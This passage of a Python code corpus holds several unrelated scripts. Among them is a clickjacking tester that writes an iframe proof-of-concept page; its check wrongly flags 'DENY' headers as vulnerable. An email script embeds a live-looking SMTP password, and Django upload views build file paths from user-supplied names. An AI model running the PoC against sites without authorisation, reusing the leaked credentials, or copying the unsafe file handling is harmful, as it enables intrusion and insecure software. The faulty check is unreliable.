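\n\n# Behaviour sketch (illustration only, not part of the module):\n#   _get_last_n_lines(Path('logs/latest.log'), 5, last_line=None)\n#   returns up to 5 newest lines, oldest first; the backwards scan stops\n#   early as soon as the previously remembered last_line marker is reached.\n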
","sub_path":"components/watcher_handle.py","file_name":"watcher_handle.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"45716782","text":"import time\nimport os\nimport sys\n\nfrom formlang.contextfree import Grammar\nfrom formlang.graph import read_graph_from_file\nfrom antlr4.InputStream import InputStream\nfrom formlang.query import ParseError, parse_query\nfrom formlang.db import Executor, FileDatabase\n\n\nGRAPHS = {\n    \"FullGraph\": [\n        \"fullgraph_10\",\n        \"fullgraph_50\",\n        \"fullgraph_100\",\n        \"fullgraph_200\",\n        \"fullgraph_500\"\n    ],\n    \"MemoryAliases\": [\n        \"wc.txt\",\n        \"bzip2.txt\",\n        \"pr.txt\",\n        \"ls.txt\",\n    ],\n    \"WorstCase\": [\n        \"worstcase_4\",\n        \"worstcase_8\",\n        \"worstcase_16\",\n        \"worstcase_32\",\n        \"worstcase_64\",\n        \"worstcase_128\",\n        \"worstcase_256\",\n    ]\n}\n\nALGORITHMS = [\"hellings\", \"matrix\", \"tensor\"]\n\n\ndef measure(db_path, graph, grammar_path, algorithm):\n    grammar = \"\"\n    start = None\n    with open(grammar_path, \"r\") as f:\n        for line in f:\n            lhs, rhs = line.strip().split(\" \", 1)\n            if start is None:\n                start = lhs\n            grammar += f\"{lhs} = {rhs};\\n\"\n\n    script = f\"\"\"\nconnect \"{db_path}\";\n{grammar}\nselect a, b from \"{graph}\" where path(a, b, {start}) using \"{algorithm}\";\n\"\"\"\n\n    print(script)\n\n    t1 = time.time()\n    parsed = parse_query(InputStream(script))\n    executor = Executor(FileDatabase())\n    executor.execute_many(parsed)\n    t2 = time.time()\n\n    return t2 - t1\n\n\ndef benchmark_cfpq(datapath):\n    for ds in GRAPHS:\n        graphs = GRAPHS[ds]\n        grammars = sorted(os.listdir(os.path.join(datapath, ds, \"grammars\")))\n        db_path = os.path.join(datapath, ds, \"graphs\")\n\n        for graph in graphs:\n            for algorithm in ALGORITHMS:\n                for grammar in grammars:\n                    print(algorithm, grammar, graph, file=sys.stderr)\n                    try:\n                        grammar_path = os.path.join(datapath, ds, \"grammars\", grammar)\n                        timing = measure(db_path, graph, grammar_path, algorithm)\n                        print(\"%.5f sec\" % timing, file=sys.stderr)\n                    except KeyboardInterrupt:\n                        print(\"Press ^C again to exit, press ENTER to continue\", file=sys.stderr)\n                        input()\n
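\n\n# Hypothetical entry point (assumption; the module defines none itself):\n#   benchmark_cfpq('/data/cfpq')  # times every (graph, algorithm, grammar) triple\n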
","sub_path":"formlang/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"63777954","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import HttpResponse\nfrom fileManager.models import UserFile, FileMap\nfrom sign_io.models import User\nfrom knowNet.models import UserNode, NodeMap, FileNode\nfrom django.core import serializers\nimport os, random\nfrom django.conf import settings\nfrom django.db import IntegrityError\nimport requests, json\nfrom PIL import Image\nfrom datetime import datetime\nimport numpy as np\nimport hashlib\nimport zipfile\n\n'''\nMove a file or folder into a folder\n\n@param: userId fileId dirId\n@return res['status'] 'OK' | 'NOTOK'\n\n'''\n\ndef moveToDir(request):\n    res = {}\n    res['status'] = 'ERROR'\n    if request.method == 'POST':\n        userId = request.POST.get(\"userId\")\n        fileId = request.POST.get(\"fileId\")\n        dirId = request.POST.get(\"dirId\")\n\n        user = User.objects.get(userId=userId)\n        filemap = FileMap.objects.get(fileId=fileId)\n        uf = UserFile.objects.filter(usermap=user, filemap=filemap)\n        \n        if uf.exists():\n            query = uf[0]\n            query.dirId = dirId\n            query.save()\n            res['status'] = 'OK'\n        else:\n            res['status'] = 'NOTOK'\n        \n    return JsonResponse(res)\n\n'''\n\nRename a file or folder\n\n@param: userId fileId rename\n@return: res['status'] 'OK' | 'NOTOK'\n\n'''\n\ndef rename(request):\n    res = {}\n    res['status'] = 'ERROR'\n    if request.method == 'POST':\n        userId = request.POST.get(\"userId\")\n        fileId = request.POST.get(\"fileId\")\n        renameBuffer = request.POST.get(\"rename\")\n\n        user = User.objects.get(userId=userId)\n        filemap = FileMap.objects.get(fileId=fileId)\n        uf = UserFile.objects.filter(usermap=user, filemap=filemap)\n        \n        if uf.exists():\n            query = uf[0]\n            query.fileName = renameBuffer\n            query.save()\n            res['fileName'] = query.fileName\n            res['status'] = 'OK'\n        else:\n            res['status'] = 'NOTOK'\n        \n    return JsonResponse(res)\n\n'''\n\nCreate a new folder and save it under the corresponding user\n\n@param request GET request\n@return JsonResponse(res) \n\n'''\n\ndef getMkdir(request):\n    res = {}\n    res['status'] = 'ERROR'\n    if request.method == 'GET':\n        dirId = request.GET.get(\"dirId\")\n        userId = request.GET.get(\"userId\")\n        user = User.objects.get(userId=userId)\n        fileId = makeFileId()\n        \n        newFile = FileMap()\n        newFile.fileId = fileId\n        newFile.ownermap = user\n        newFile.filePath = os.path.join(settings.MEDIA_ROOT, str(userId), str(fileId))\n        newFile.fileType = 100\n        newFile.fileMd5 = hashlib.md5(str(datetime.now()).encode(\"utf-8\")).hexdigest()\n        newFile.buildTime = datetime.now()\n        newFile.modTime = datetime.now()\n        newFile.readTime = datetime.now()\n        newFile.save()\n        os.makedirs(newFile.filePath)\n\n        dirName = \"新建文件夹\"  # default display name for a new folder (\"New Folder\")\n        testName = dirName\n        counter = 1\n        arr = UserFile.objects.filter(fileName=testName, dirId=dirId)\n        while arr.exists():\n            testName = dirName + str(counter)\n            arr = UserFile.objects.filter(fileName=testName, dirId=dirId)\n            counter += 1\n        \n        dirName = testName\n        newQuery = UserFile()\n        newQuery.usermap = user\n        newQuery.filemap = FileMap.objects.get(fileId=fileId)\n        newQuery.fileName = dirName\n        newQuery.dirId = dirId\n        newQuery.save()\n        res['status'] = 'OK'\n        \n    return JsonResponse(res)\n\n'''\n\nGet the list of starred files\n\n@param request GET/POST request\n@return JsonResponse(res) \n\n'''\n\ndef getStarFileList(request):\n    res = {}\n    if request.method == 'GET':\n        userId = request.GET.get('userID')\n        user = User.objects.get(userId=userId)\n        fileRes = user.userfile_set.all()\n        #fileRes = UserFile.objects.filter(userId=user)\n        fileList = []\n        # i is a UserFile row from the userId query result\n        for i in fileRes:\n            if i.star == \"true\":\n                fileMap = FileMap.objects.filter(fileId=i.filemap.fileId)[0]\n\n                fileList.append({\n                    'name': fileMap.fileName,\n                    'id': i.filemap.fileId,\n                    'type': fileMap.fileType,\n                    'commitMsg': i.commitMsg,\n                    'star': i.star\n                })\n\n        res['fileList'] = fileList\n    return JsonResponse(res)\n\n'''\n\nSet/unset the star on a file\n\n@param request GET/POST request\n@return JsonResponse(res) \n\n'''\n\ndef getStar(request):\n    if request.method == 'GET':\n        userId = request.GET.get('userId')\n        fileId = request.GET.get('fileId')\n        status = request.GET.get('star') \n        user = User.objects.get(userId=userId)\n        filemap = FileMap.objects.get(fileId=fileId)\n        catchFile = UserFile.objects.filter(usermap=user, filemap=filemap)\n        for i in catchFile:\n            i.star = status\n            i.save()\n        return HttpResponse('OK', status=200)\n\n    return HttpResponse('error', status=403)\n\ndef writeAllFileToZip(saveDir, zipFile, userfile):\n    uflist = UserFile.objects.filter(usermap=userfile.usermap, dirId=userfile.filemap.fileId)\n    for uf in uflist:\n        savePath = os.path.join(saveDir, uf.fileName)\n        if uf.filemap.fileType == 100:\n            zipFile.write(uf.filemap.filePath, savePath)  # create the folder entry in the zip file\n            writeAllFileToZip(savePath, zipFile, uf)  # recurse into the sub-folder\n        else:  # a regular file: write it straight into the zip file\n            zipFile.write(uf.filemap.filePath, savePath)\n    return\n
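\n# Illustrative example (assumption): for a tree  docs/ -> {a.txt, sub/ -> b.txt},\n# writeAllFileToZip('docs', zf, uf_docs) emits the entries\n#   docs/a.txt, docs/sub (folder entry), docs/sub/b.txt\n# and leaves closing the ZipFile to the caller.\n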
\n'''\n\nGet a file for download\n\n@param1: userId\n@param2: fileId\n\n'''\n\ndef getDownloadFile(request):\n    res = HttpResponse('ERROR')\n    if request.method == 'GET':\n        userId = request.GET.get('userId')\n        fileId = request.GET.get('fileId')\n\n        user = User.objects.get(userId=userId)\n        filemap = FileMap.objects.get(fileId=fileId)\n        catchFile = UserFile.objects.filter(usermap=user, filemap=filemap)\n        if catchFile.exists():\n            filePath = filemap.filePath\n            fileName = catchFile[0].fileName\n            if filemap.fileType == 100:\n                zipFilePath = os.path.join(os.path.dirname(filePath), fileName + '.zip')\n                if not os.path.exists(zipFilePath):\n                    zipFile = zipfile.ZipFile(zipFilePath, \"w\", zipfile.ZIP_DEFLATED)\n                    writeAllFileToZip(fileName, zipFile, catchFile[0])\n                    zipFile.close()\n                filePath = zipFilePath\n                fileName += '.zip'\n            with open(filePath, \"rb\") as f:\n                res = HttpResponse(f)\n                disposition = \"attachment; filename=\" + fileName\n                res[\"Content-Disposition\"] = disposition.encode('utf-8', 'ISO-8859-1') \n    return res\n\n\ndef getFileList(request):\n    res = {}\n    res['status'] = 'ERROR'\n    if request.method == 'GET':\n        userId = request.GET.get('userId')\n        dirId = request.GET.get('dirId')\n        user = User.objects.get(userId=userId)\n        if dirId == \"-1\":\n            fileRes = user.userfile_set.all()\n            res['fileRes'] = -1\n        else:\n            fileRes = user.userfile_set.filter(dirId=dirId)\n            res['fileRes'] = dirId\n\n        fileList = []\n        # i is a UserFile row matching the userId & dirId query\n        for i in fileRes:\n            fileMap = FileMap.objects.filter(fileId=i.filemap.fileId)[0]\n\n            fileList.append({\n                'name': i.fileName,\n                'id': fileMap.fileId,\n                'dirId': i.dirId,\n                'type': fileMap.fileType,\n                'readTime': fileMap.readTime,\n                'commitMsg': i.commitMsg,\n                'star': i.star\n            })\n\n        res['fileList'] = fileList\n        res['status'] = 'OK'\n    return JsonResponse(res)\n\n'''\n\nDelete a user's file together with its database records\n\n@param request GET request\n@return JsonResponse(res) \n\n'''\n\ndef deleteFile(request):\n    res = {}\n    res['state'] = 'error'\n    res['method'] = 'unknown'\n    if request.method == 'GET':\n        res['method'] = 'GET'\n        userId = request.GET.get('userId')\n        fileId = request.GET.get('fileId')\n        \n        user = User.objects.get(userId=userId)\n        filemap = FileMap.objects.get(fileId=fileId)\n        catchFile = UserFile.objects.filter(usermap=user, filemap=filemap)\n        if catchFile.exists():\n            catchFile.delete()\n            filemap.delete()\n            filePath = filemap.filePath\n            if os.path.exists(filePath):\n                os.remove(filePath)\n            res['state'] = 'ok'\n            return JsonResponse(res)\n        else:\n            res['status'] = 'uncatch'\n            return JsonResponse(res) \n    return JsonResponse(res)\n\ndef makeFileId():\n    return int(random.random() * 1000000)\n\ndef checkFileType(fileName):\n    fname, suffix = os.path.splitext(fileName)\n    if suffix == \".jpg\" or suffix == \".jpeg\" or suffix == \".png\":\n        return 1\n    elif suffix == \".pdf\" or suffix == \".doc\" or suffix == \".docx\" or suffix == \".caj\":\n        return 2\n    elif suffix == \".xls\" or suffix == \".xlsx\":\n        return 3\n    elif suffix == \".ppt\" or suffix == \".pptx\":\n        return 4\n    elif suffix == \".mp4\" or suffix == \".mov\":\n        return 5\n    return 6\n
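\n# Examples (illustration only): checkFileType('report.docx') -> 2,\n# checkFileType('photo.JPG') -> 6, since the suffix comparison is case-sensitive.\n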
\ndef magicBox(filePath, fileType):\n    resStr = '['\n    classModel = 'noModel'\n    if fileType == 1:\n        classModel = 'cifar10'\n        imageData = Image.open(filePath)\n        imageThreeMatrix = np.asarray(imageData.convert(\"RGB\").resize((32, 32)))\n        # scale pixel values from [0, 255] to [-1, 1]\n        imageThreeMatrix = 2 * (imageThreeMatrix / 255.) - 1\n        for imageMatrix in imageThreeMatrix:\n            resStr += '['\n            for imageVector in imageMatrix:\n                resStr += '['\n                for imageValue in imageVector:\n                    resStr += str(imageValue) + ','\n                resStr = resStr[:-1]\n                resStr += '],'\n            resStr = resStr[:-1]\n            resStr += '],'\n    else:\n        # placeholder so the trailing-comma strip below still leaves '[]'\n        resStr += ','\n    resStr = resStr[:-1]\n    resStr += ']'\n    return resStr, classModel\n\ndef classification(filePath, fileType):\n    dataStr, classModel = magicBox(filePath, fileType)\n    if classModel == 'noModel': return dataStr\n    postData = '{\"instances\": ' + dataStr + '}'\n    # postData = '{\"instances\": [1.0, 2.0, 5.0]}'\n    url = 'http://172.25.0.6:8501/v1/models/' + classModel + ':predict'\n    r = requests.post(url, postData) \n    res = json.loads(str(r.text))\n    autoNode = res['predictions'][0]\n    return autoNode\n\ndef dimRed(unode, fnode):\n    fv = np.array([float(x) for x in fnode.classVector.split()])\n    uv = np.array([float(x) for x in unode.classVector.split()])\n    # row index of the largest outer-product entry (rows follow uv)\n    userClass, _ = divmod(np.argmax(np.outer(uv, fv)), len(fv))\n    return userClass\n\n'''\n\nReceive uploaded files and save them under the corresponding user\n\n@param request GET/POST request\n@return JsonResponse(res) \n@exception/throws IntegrityError file-name conflict\n\n'''\n\ndef upload(request):\n    res = {}\n    res['status'] = 'ERROR'\n\n    if request.method == 'POST':\n        myFile = request.FILES.getlist(\"userfiles\", [])\n        fileIdList = []\n        fileExceptList = []\n        res['fileId'] = ''\n        wrongFlag = 0\n        \n        for filePot in myFile:\n            fileName = filePot.name\n            fileId = makeFileId()\n            fileType = checkFileType(fileName)\n            userId = request.POST.get(\"userId\")\n            user = User.objects.get(userId=userId)\n\n            newFile = FileMap()\n            newFile.fileId = fileId\n            newFile.ownermap = user\n            newFile.filePath = os.path.join(settings.MEDIA_ROOT, str(userId), fileName)\n            newFile.fileType = fileType\n            newFile.fileField = filePot\n            newFile.fileMd5 = hashlib.md5(str(filePot).encode(\"utf-8\")).hexdigest()\n            newFile.buildTime = datetime.now()\n            newFile.modTime = datetime.now()\n            newFile.readTime = datetime.now()\n            try:\n                newFile.save()\n                fileIdList.append(fileId)\n            except IntegrityError as err:\n                fileExceptList.append(fileName)\n                wrongFlag = 1\n                res['status'] = str(err)\n            autoNode = None  # default when no class vector is produced\n            fileVector = classification(newFile.filePath, fileType)\n            # res['fileVector'] = fileVector\n            if len(fileVector):\n                fnode = FileNode() \n                fnode.filemap = newFile\n                fnode.classVector = str(fileVector)[1:-1].replace(',', '')  # e.g. 1.222 2.444 4.777\n                fnode.save()\n\n                unode = UserNode.objects.filter(usermap=user) \n                if not unode.exists():\n                    unode = UserNode()\n                    unode.usermap = user\n                    unode.classVector = str(list(np.ones(len(fileVector))))[1:-1].replace(',', '')  # e.g. 1.0 1.0 1.0\n                    unode.save()\n                else:\n                    unode = unode[0]\n                \n                # NOTE: the arguments are passed in (fnode, unode) order on purpose;\n                # with the all-ones user vector this makes dimRed() return the index\n                # of the file vector's largest entry\n                autoNode = dimRed(fnode, unode)\n                nodes = NodeMap.objects.filter(unodemap=unode, nodeValue=autoNode)\n                if nodes.exists():\n                    nodeName = nodes[0].nodeName\n                else:\n                    nodeName = \"newNode\" + str(autoNode)\n                \n                newNode = NodeMap()\n                newNode.fnodemap = fnode\n                newNode.unodemap = unode\n                newNode.nodeName = nodeName\n                newNode.nodeValue = autoNode\n                newNode.save()\n                res['class'] = int(autoNode)\n\n            res['fileType'] = fileType\n            \n            newQuery = UserFile()\n            newQuery.usermap = user\n            newQuery.filemap = newFile\n            newQuery.fileName = os.path.basename(newFile.filePath)\n            newQuery.fileClass = autoNode\n            # set the upload-folder path (dirId 0 is the upload folder)\n            newQuery.dirId = 0\n            newQuery.save()\n\n        if wrongFlag == 0:\n            res['status'] = 'OK'\n        elif wrongFlag == 1:\n            res['fileExcept'] = fileExceptList\n        res['fileId'] = fileIdList\n    return JsonResponse(res)\n\ndef commitFile(request):\n    res = {}\n    res['state'] = 'error'\n    if request.method == 'POST':\n        userId = 
request.POST.get(\"userId\")\n filesId = request.POST.getlist(\"fileId\", [])\n commitMsg = request.POST.get(\"commitMsg\")\n change = 0\n for fileId in filesId:\n usermap = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n uf = UserFile.objects.get(usermap=usermap, filemap=filemap)\n uf.commitMsg = commitMsg\n uf.save()\n change = change + 1\n res['change'] = change\n res['state'] = 'ok'\n\n return JsonResponse(res, safe=False)\n\n\n","sub_path":"Apache-Django/autosort/fileManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479337757","text":"# import from system\nfrom concurrent.futures import ThreadPoolExecutor as executor\nfrom typing import Optional\n\n#import from packages\nimport requests\nimport pandas as pd\nimport pendulum\n\n\n#app imports\nfrom DB.transactions import add_batch_observations\n\n__all__ = ['fetch']\n\ndef build_url(num:int) -> str:\n \"\"\"\n builds the url to fetch the data at ipeadatas webpage. \n \"\"\"\n return f'http://ipeadata.gov.br/ExibeSerie.aspx?oper=export&serid{num}={num}'\n \n\ndef process(url:str) -> pd.DataFrame:\n \"\"\"\n fetch the data returning a dataframe\n \"\"\"\n df = pd.read_excel(url, parse_dates=[0])\n df.columns = [\"data\", \"values\"]\n return df.set_index([\"data\"])\n\n\ndef fetch(tickers:list, limit: Optional[int]) -> dict:\n \"\"\"\n \"\"\"\n global dfs\n urls =[build_url(tcks.split(\".\")[1]) for tcks in tickers]\n with executor() as e:\n dfs = list(e.map(process, urls))\n\n with executor() as e1:\n dz = zip(tickers, dfs)\n e1.map(lambda z: add_batch_observations(*z), list(dz))\n \n return {\"source\": \"IPEA\", \"status\": \"updated\", \n \"time\": pendulum.now().to_datetime_string(), \n \"limit\": limit}\n\n\n\n","sub_path":"Loaders/Observations/ipea.py","file_name":"ipea.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19684451","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\n\nimport flask\nimport requests\nfrom flask import Response, redirect, url_for, request, session, jsonify, flash\nfrom flask_github import GitHub\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\n\nfrom .constants import PYBEL_GITHUB_CLIENT_ID, PYBEL_GITHUB_CLIENT_SECRET\n\nlogin_log = logging.getLogger('pybel.web.login')\n\n\ndef get_github_info(token):\n return requests.get('https://api.github.com/user', params={'access_token': token}).json()\n\n\nadministrator_usernames = {'cthoyt', 'ddomingof', 'cebel'}\n\n\nclass User(UserMixin):\n def __init__(self, github_access_token):\n self.id = github_access_token\n info = get_github_info(github_access_token)\n self.username = info['login']\n self.name = info['name']\n self.user_id = int(info['id'])\n\n def __repr__(self):\n return self.id\n\n @property\n def admin(self):\n return self.username in administrator_usernames\n\n @property\n def display(self):\n return self.name if self.name else self.username\n\n\ndef build_github_login_service(app):\n \"\"\"Adds the login service\n \n Before adding this service, both ``GITHUB_CLIENT_ID`` and ``GITHUB_CLIENT_SECRET`` need to be set in the app's\n configuration\n \n :param flask.Flask app: A Flask app\n \"\"\"\n app.config.update({\n 'GITHUB_CLIENT_ID': os.environ[PYBEL_GITHUB_CLIENT_ID],\n 'GITHUB_CLIENT_SECRET': 
os.environ[PYBEL_GITHUB_CLIENT_SECRET]\n })\n\n # flask-login\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'login'\n\n # setup github-flask\n github = GitHub(app)\n\n @github.access_token_getter\n def token_getter():\n if current_user is not None:\n return current_user.id\n\n @app.route('/login', methods=['GET', 'POST'])\n def login():\n if session.get('user_id', None) is None:\n return github.authorize()\n else:\n flask.flash('Already logged in')\n return redirect(url_for('index'))\n\n @app.route('/github-callback')\n @github.authorized_handler\n def authorized(access_token):\n next_url = request.args.get('next') or url_for('view_networks')\n if access_token is None:\n return redirect(next_url)\n\n user = User(access_token)\n\n if app.config.get('PYBEL_WEB_STRICT_LOGIN') and not user.name:\n flash('Please add your name to your GitHub account to use PyBEL Web')\n return redirect(url_for('index'))\n\n login_user(user)\n login_log.info('Login from %s by %s (%s)', request.remote_addr, user.name, user.username)\n\n return redirect(next_url)\n\n @app.route('/logout')\n @login_required\n def logout():\n logout_user()\n flash('Logged out')\n return redirect(url_for('view_networks'))\n\n @app.errorhandler(401)\n def page_not_found(e):\n return Response('
Login failed
')\n\n # callback to reload the user object\n @login_manager.user_loader\n def load_user(id):\n return User(id)\n\n @app.route('/user')\n @login_required\n def show_user():\n return jsonify(github.get('user'))\n","sub_path":"src/pybel_tools/web/github_login_service.py","file_name":"github_login_service.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311517278","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nbrowser = webdriver.Chrome(executable_path='C:\\\\Users\\\\vinic\\\\Desktop\\\\MyPythonScripts\\\\chromedriver.exe')\r\nbrowser.get('https://inventwithpython.com/')\r\n\r\nlinkElem = browser.find_element_by_link_text('Coding with Minecraft')\r\nlinkElem.click()\r\nlinkElem = browser.find_element_by_link_text('Buy on Amazon')\r\nlinkElem.click()\r\n\r\nbrowser.get('https://mail.yahoo.com')\r\nemailElem = browser.find_elements_by_id('login-username')\r\nemailElem[0].send_keys('teste')\r\nnextElem = browser.find_elements_by_id('login-signin')\r\nnextElem[0].click()","sub_path":"testeSeleniumChrome.py","file_name":"testeSeleniumChrome.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21190826","text":"from app import blueprint, db\nfrom app.models import User, OAuth\n\nfrom flask_dance.consumer import oauth_authorized, oauth_error\nfrom flask_dance.contrib.google import google\nfrom flask_login import login_user\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom flask import flash\n\n\n# Util function which will manage the registration of\n# the account with the local db instance upon successful\n# OAuth authentication with Google.\n@oauth_authorized.connect_via(blueprint)\ndef google_logged_in(blueprint, token):\n if not token:\n flash(\"Failed to login with Google credentials.\", category=\"danger\")\n return False\n\n resp = google.get(\"oauth2/v2/userinfo\")\n if not resp.ok:\n flash(\"Failed to fetch user info from Google.\", category=\"danger\")\n return False\n\n google_info = resp.json()\n google_user_id = google_info.get(\"id\")\n\n # Check the database for existing OAuth token; if one isn't\n # there create one.\n try:\n oauth = OAuth.query.filter_by(\n provider=blueprint.name,\n provider_user_id=google_user_id\n ).one()\n except NoResultFound:\n oauth = OAuth(\n provider=blueprint.name,\n provider_user_id=google_user_id,\n token=token\n )\n\n if oauth.user:\n login_user(oauth.user)\n flash(f\"{oauth.user.name}, login successful.\", category=\"primary\")\n else:\n user = User(\n email=google_info.get(\"email\"),\n name=google_info.get(\"name\")\n )\n oauth.user = user\n db.session.add_all([user, oauth])\n db.session.commit()\n login_user(user)\n flash(f\"{user.name}, registration successful.\", category=\"primary\")\n\n # Short-circuit Flask-Dance'es default behaviour\n return False\n","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98125247","text":"# -*- coding: utf-8 -*-\n\"\"\" run_tensorboard \"\"\"\n\nimport os\nimport argparse\n\nfrom constants import Dataset\nfrom utils.utils import get_tensorboard_log_path\n\n\ndef parse_args():\n \"\"\" Parses the arguments \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset',\n type=int,\n 
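        # --dataset takes the integer ID of an entry in the project's Dataset
        # enum; a hypothetical invocation (the ID value is assumed, not verified):
        #   python run_tensorboard.py --dataset 1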
default=Dataset.SIGNET_RING,\n help='Dataset logs to use. Options: {}'.format(Dataset.print_choices())\n )\n\n return parser.parse_args()\n\n\ndef main():\n \"\"\" main \"\"\"\n args = parse_args()\n path = get_tensorboard_log_path(args.dataset)\n print(\"Running tensorboard for {} dataset\".format(Dataset.print_name(args.dataset)))\n os.system('tensorboard --logdir {}'.format(path))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_tensorboard.py","file_name":"run_tensorboard.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373730339","text":"import optparse\nimport requests\nimport sys\nimport webbrowser\n\ndef main():\n parser = optparse.OptionParser(usage=\"python3 %prog -u -c \")\n parser.add_option(\"-u\", dest=\"url\", default=False, help=\"url target\", type=\"string\")\n parser.add_option(\"-c\", dest=\"cookies\", default=False, help=\"cookies if auth page\", type=\"string\")\n (options, args) = parser.parse_args()\n urlTarget = options.url\n cookiesTarget = options.cookies\n\n if sys.argv[0] == None:\n print(parser.usage)\n\n\n if urlTarget == None or cookiesTarget == None:\n print(parser.usage)\n exit(0)\n else:\n check = checkUrl(urlTarget)\n if check:\n print(\"[+] Vulnerable making PoC\")\n clickJPoc(urlTarget, cookiesTarget)\n else:\n print(\"[-] NOT Vulnerable\")\n exit(0)\n\ndef checkUrl(url):\n if \"http\" not in url:\n Newurl = \"http://\" + url\n \n print(\"[+] Making request to {}\".format(Newurl))\n try:\n r = requests.get(Newurl, allow_redirects=True)\n if not \"X-Frame-Options\" in r.headers:\n return True\n elif r.headers[\"X-Frame-Options\"] == 'DENY':\n return True\n else:\n return False\n\n except Exception as e:\n print(\"[-] Error {}\".format(e))\n\n\ndef clickJPoc(url, cookies=\"\"):\n Newurl = \"http://\" + url\n iframe = \"\"\"\n \n Clickjack test page\n \n
Website is vulnerable to clickjacking!
\n \n \n \n \"\"\".format(Newurl)\n print(\"[+] Writing PoC !\")\n writePoC(iframe)\n\ndef writePoC(iframe):\n\n try:\n f = open(\"/tmp/iframe.html\", 'w')\n f.write(iframe)\n f.close()\n print(\"[+] File write with sucess.. you can now use in your browser\")\n except Exception as e:\n print(\"[+] Something went wrong while writing file\")\n print(e)\n\n ans = input(\"Do u want to open PoC in your browser y/n ? \".lower())\n if ans == \"y\":\n try:\n url = \"file:///tmp/iframe.html\"\n webbrowser.open(url)\n except Exception as e:\n print(\"[-] Error try install webbrowser lib !\")\n print(e) \n else:\n print(\"[+] Go to your Desktop and get the iframe.html!\")\n\n \n\nmain()\n","sub_path":"clickJacking.py","file_name":"clickJacking.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"170391484","text":"import requests,random,smtplib,schedule,time\nfrom bs4 import BeautifulSoup\nfrom urllib.request import quote\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n# 获取电影名单\ndef get_movie():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n }\n movie_list = []\n for x in range(10):\n URL = 'https://movie.douban.com/top250?start=' + str(x) + '&filter='\n res_movie = requests.get(URL,headers=headers)\n suop_movies = BeautifulSoup(res_movie.text,'html.parser').find_all('div',class_='item')\n for suop_movie in suop_movies:\n movie_name = suop_movie.find(class_='title').text\n movie_list.append(movie_name)\n return movie_list\n\n# 下载电影\ndef download_movie(movie_name):\n movie_name= movie_name\n gbk_movie = movie_name.encode('gbk')\n find_movie = 'http://s.ygdy8.com/plus/s0.php?typeid=1&keyword=' + quote(gbk_movie)\n res_movie = requests.get(find_movie)\n res_movie.encoding = 'gbk'\n suop_movies = BeautifulSoup(res_movie.text,'html.parser').find(class_='co_content8').find_all('table')\n if suop_movies:\n movie_link = 'https://www.ygdy8.com' + suop_movies[0].find('test_1')['href']\n res_movie1 = requests.get(movie_link)\n res_movie1.encoding = 'gbk'\n movie_download_link = BeautifulSoup(res_movie1.text,'html.parser').find('div',id='Zoom').find('span').find('table').find('test_1')['href']\n return movie_name + '的链接为:' + movie_download_link\n else:\n return '没有找到' + movie_name + '的链接'\n\n# 通过随机数获取电影名称\ndef chooise_movie():\n l = []\n for i in range(3):\n x = random.randint(1,250)\n if x in l:\n continue\n else:\n l.append(x - 1)\n return l\n\n# 获取电影名和下载链接\ndef main():\n movie_str = ''\n for i in chooise_movie():\n movie_name = get_movie()[i]\n movie_str += download_movie(movie_name) + \"\\n\"\n return movie_str\n\n# 发送邮件\ndef send_mail():\n mailhost = 'smtp.casc.ac.cn'\n cascmail = smtplib.SMTP()\n cascmail.connect(mailhost,25)\n account = 'czl@casc.ac.cn'\n password = 'idc888888'\n cascmail.login(account, password)\n receiver = '344319484@qq.com'\n message = MIMEText(main(),'plain','utf-8')\n subject = '豆瓣高评分电影下载'\n message['Subject'] = Header(subject,'utf-8')\n try:\n cascmail.sendmail(account,receiver,message.as_string())\n return '邮件发送成功'\n except:\n return '邮件发送失败'\n cascmail.quit()\n\n# 创建定时任务\ndef job():\n print('第一次发送')\n send_mail()\n time.sleep(2)\n print('发送成功')\n\n# 定时任务执行时间\nschedule.every(5).seconds.do(job)\n\n# 每个定时任务执行间隔\nwhile True:\n schedule.run_pending()\n 
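    # schedule only fires jobs whose interval has elapsed when run_pending()
    # is polled, so the loop sleeps briefly between polls to avoid a busy-wait.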
